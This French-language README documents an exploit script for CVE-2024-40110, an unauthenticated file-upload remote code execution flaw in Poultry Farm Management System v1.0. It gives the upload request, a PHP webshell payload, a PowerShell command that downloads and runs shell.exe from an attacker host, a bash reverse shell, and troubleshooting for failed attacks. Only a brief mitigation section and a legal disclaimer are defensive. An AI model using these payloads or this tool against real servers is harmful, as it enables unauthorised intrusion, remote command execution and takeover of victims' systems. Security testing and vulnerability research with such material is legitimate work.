
Exploit pour CVE-2024-40110, une exécution de code à distance (RCE) par téléchargement de fichier non authentifié dans Poultry Farm Management System v1.0. Télécharge un shell PHP pour exécuter des commandes arbitraires sur la cible.
Téléchargement de fichier non authentifié avec exécution de code à distance
Le système de gestion de ferme avicole v1.0 contient une vulnérabilité critique dans la fonctionnalité de téléchargement de produits. L'application ne valide ni ne nettoie correctement les fichiers téléchargés, permettant aux attaquants de télécharger des fichiers PHP déguisés en images de produits. Ces fichiers PHP téléchargés peuvent être exécutés pour réaliser une exécution de code à distance.
POST /paultry/farm/product.php ou POST /farm/product.php
La vulnérabilité peut être exploitée en :
requestscolorama (pour sortie colorée)pip install requests colorama
Ou installez toutes les dépendances :
pip install -r requirements.txt
Exécutez le script de manière interactive :
python exploit.py
Le script vous demandera :
==================================================
Outil interactif de téléchargement de backdoor
==================================================
Entrez l'adresse IP cible : 192.168.1.100
Entrez le port cible (par défaut : 80) : 8080
Entrez la commande à exécuter (par défaut : charge utile powershell) :
Commande : whoami
==================================================
CONFIRMATION
==================================================
URL cible : http://192.168.1.100:8080
Commande : whoami
Voulez-vous continuer ? (oui/non) : oui
✅ Saisie interactive - Demande l'IP, le port et les commandes personnalisées
✅ Valeurs par défaut - Valeurs par défaut pratiques
✅ Sortie colorée - Sortie terminal colorée facile à lire
✅ Étape de confirmation - Vérifier les paramètres avant exécution
✅ Gestion des erreurs - Messages d'erreur élégants pour les requêtes échouées
✅ Commandes flexibles - Prise en charge de toute commande shell ou payload PowerShell
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/system()POST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMMAND_HERE');?>
L'exploit a été testé sur :
⚠️ AVERTISSEMENT LÉGAL
Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et d'éducation. L'accès non autorisé aux systèmes informatiques est illégal.
Mettre à jour le logiciel - Appliquer les correctifs de sécurité si disponibles
Validation du téléchargement de fichiers
Configuration
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
Contrôle d'accès
Surveillance
Erreur : Connexion refusée
Solution : Vérifiez que l'IP et le port cibles sont corrects et que l'application est en cours d'exécution
Erreur : Échec du téléchargement du shell. Code d'état : 404
Solution : Le chemin du point de terminaison peut différer. Chemins courants : /farm/, /paultry/farm/
Erreur : La sortie de la commande est vide
Solution : L'exécution PHP peut être désactivée ou le fichier n'a pas été téléchargé correctement
Pour les problèmes, questions ou améliorations, référez-vous au dépôt GitHub ou à la page Exploit-DB.
Dernière mise à jour : Décembre 2024
Statut : Vérifié et testé